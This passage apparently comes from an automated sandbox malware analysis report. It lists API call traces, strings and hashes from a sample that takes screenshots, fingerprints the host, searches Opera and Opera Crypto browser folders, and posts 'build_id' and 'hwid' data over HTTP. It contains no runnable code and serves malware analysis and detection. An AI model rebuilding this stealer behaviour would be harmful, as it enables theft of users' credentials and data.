                                                                                                                                                                                                                                          • Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
                                                                                                                                                                                                                                          • Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040455A
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0145F7A0,?,?,?,?,?,?,00000000), ref: 0040457A
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404704
                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,0145F8C0,?,01462F48,00000000,00000000,-00400100,00000000), ref: 00404745
                                                                                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 0040476B
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,004201A9,?,?,?,00427895,00000000,004201A9,?,00000000,004201A9,",00000000,004201A9,build_id), ref: 00404A3A
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00404A53
                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A7B
                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404ACF
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404ADA
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00404AEF
                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404AF9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                                                        • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                        • API String ID: 1585128682-3346224549
                                                                                                                                                                                                                                        • Opcode ID: ee956d695974c9b5f59e4f9e12a161d67f1cde6b0e86407fe14457c4f0616a06
                                                                                                                                                                                                                                        • Instruction ID: 05938b0e318a003ddb6cc0cd5bccca28d8fa4bc8ac54279827d029eeae647f4c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee956d695974c9b5f59e4f9e12a161d67f1cde6b0e86407fe14457c4f0616a06
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76223F71805149EADB15E7E5C952BEEBBB8AF19304F2440AEF50173182DE782B4CCB79
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
                                                                                                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                        • API String ID: 3088078853-445461498
                                                                                                                                                                                                                                        • Opcode ID: d61862649c0691cf466ae063ace5fa7c70b2f5291ea304154e783de05e2bbed1
                                                                                                                                                                                                                                        • Instruction ID: 98b5a54622b645726d4fda38e5423e71ee503b351a3d596aa25196b1fd800074
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d61862649c0691cf466ae063ace5fa7c70b2f5291ea304154e783de05e2bbed1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED81C475900219ABCB10EFA1DC85BEE77B9BF49704F50459EFA09A3181DB385B48CBA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
                                                                                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
                                                                                                                                                                                                                                        • CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00411186
                                                                                                                                                                                                                                          • Part of subcall function 00410FF0: CoCreateInstance.OLE32(00428AE4,00000000,00000001,00428278,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?), ref: 0041100D
                                                                                                                                                                                                                                          • Part of subcall function 00410FF0: SysAllocString.OLEAUT32(?), ref: 0041101C
                                                                                                                                                                                                                                          • Part of subcall function 00410FF0: _wtoi64.MSVCRT ref: 00411062
                                                                                                                                                                                                                                          • Part of subcall function 00410FF0: SysFreeString.OLEAUT32(?), ref: 00411078
                                                                                                                                                                                                                                          • Part of subcall function 00410FF0: SysFreeString.OLEAUT32(00000000), ref: 0041107B
                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(0042840C,?,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111C0
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?), ref: 004111CC
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4), ref: 004111D3
                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00411217
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 004111FF
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$WQL
                                                                                                                                                                                                                                        • API String ID: 1611285705-2016369993
                                                                                                                                                                                                                                        • Opcode ID: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
                                                                                                                                                                                                                                        • Instruction ID: 2f8da4572961598b54827d09d40e8d86347dea92272749ef862c40ce3fce3f1e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39b1fb2a7ba7e6d53decbf1ced49d5b46778855afd756b0b7f4cf079842b4c2d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31517C71A01229ABCB24DB95DC49EFFBB7CEF49B10F10411AF605A3290D7789942CBE4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00411E2B
                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00411EC2
                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00411ECF
                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00411ED6
                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00411EDF
                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411EF0
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00411EFB
                                                                                                                                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411F1B
                                                                                                                                                                                                                                        • GlobalFix.KERNEL32(000000FF), ref: 00411F81
                                                                                                                                                                                                                                        • GlobalSize.KERNEL32(000000FF), ref: 00411F8E
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8
                                                                                                                                                                                                                                          • Part of subcall function 00404DD0: lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E56
                                                                                                                                                                                                                                          • Part of subcall function 00404DD0: StrCmpCA.SHLWAPI(?,0145F7A0,004278A7,004278A3,0042789B,00427897,00427896), ref: 00404EE1
                                                                                                                                                                                                                                          • Part of subcall function 00404DD0: InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F07
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041200D
                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0041202B
                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00412032
                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041203A
                                                                                                                                                                                                                                        • CloseWindow.USER32(00000000), ref: 00412041
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$Window$CompatibleCreateDeleteGlobalSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                                                                                                                                                                        • String ID: image/jpeg
                                                                                                                                                                                                                                        • API String ID: 2262162031-3785015651
                                                                                                                                                                                                                                        • Opcode ID: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
                                                                                                                                                                                                                                        • Instruction ID: 2d4e664fba7b2a05d5ee53653e52332fc25948be14a74fdae1dc0a0959ef4bc3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a9ceb8a640c1142b84bfe425a3677517ac850c695dfc15065c52484ca172122
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F48170B5900209EFDB14DFA4DD45BEEBBB9EF4A704F10412EFA05A3290DB385905CBA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00416F8B
                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00416FA2
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004286D4), ref: 00416FDF
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004286D8), ref: 00416FF9
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0145F8A0), ref: 00417037
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0145F8D0), ref: 0041704B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0041705F
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0041706D
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,004286DC), ref: 0041707F
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00417093
                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 00417137
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                                                                                        • API String ID: 111849568-4073750446
                                                                                                                                                                                                                                        • Opcode ID: ae65bbd2a58c776d948ce60f7386ac89f3ae0870c585c1044f1d338b9f653277
                                                                                                                                                                                                                                        • Instruction ID: 32a1530b6f6b3f971f2372f18af5ada9a00b89577cc7e7e1cca20f8dd29428d7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae65bbd2a58c776d948ce60f7386ac89f3ae0870c585c1044f1d338b9f653277
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B51E4B1800218ABCB10EBA0CC45BEE777DBF09704F40459EFB05A3181DB789B88CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,014532E8,?), ref: 0041007C
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
                                                                                                                                                                                                                                          • Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,00000000,00000000,?,\*.*,?,?,00427ACE,00000000,?,00000005), ref: 0040B242
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427D0C), ref: 0040B2CC
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00427D10), ref: 0040B2E6
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera,00427ADB,00427ADA,00427AD7,00427AD6,00427AD3,00427AD2,00427ACF), ref: 0040B37B
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040B393
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040B3AB
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                        • String ID: ;$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                        • API String ID: 2567437900-1922906172
                                                                                                                                                                                                                                        • Opcode ID: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
                                                                                                                                                                                                                                        • Instruction ID: 9690fecaf8c131b8b47e39c0c5a29481523bcde2650c36add3c71b8764175778
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0326ac76d73bbb7b8e7228430f298a85a7715560c3c3b80257a25821b8c08668
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F524E30915248EACB15EBA5C955BDDBBB45F19304F5040BEE905B32C2EF781B4CCBAA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00424344,?,004020E0,?,00424340,?,00000000,00000000,?,00000000), ref: 00401466
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00424348), ref: 004014EC
                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0042434C), ref: 00401506
                                                                                                                                                                                                                                          • Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
                                                                                                                                                                                                                                          • Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcpy$FileFindFirstFolderPathlstrcat
                                                                                                                                                                                                                                        • String ID: &$\*.*$ @6
                                                                                                                                                                                                                                        • API String ID: 2051144152-2842159198
                                                                                                                                                                                                                                        • Opcode ID: 19b4a71a113587e3e149f119e1dcb7d57ce30e1d3e037629063eb4f8e980c3a2
                                                                                                                                                                                                                                        • Instruction ID: 44408c539f998d041f733f93c1a77994a807b49ce5d211e6c2eeeb93df41b793
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19b4a71a113587e3e149f119e1dcb7d57ce30e1d3e037629063eb4f8e980c3a2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A725D70811288EACB15E7A5C955BDDBBB85F29308F5440AEE905732C2DF781B4CCB7A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 19C54EE1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
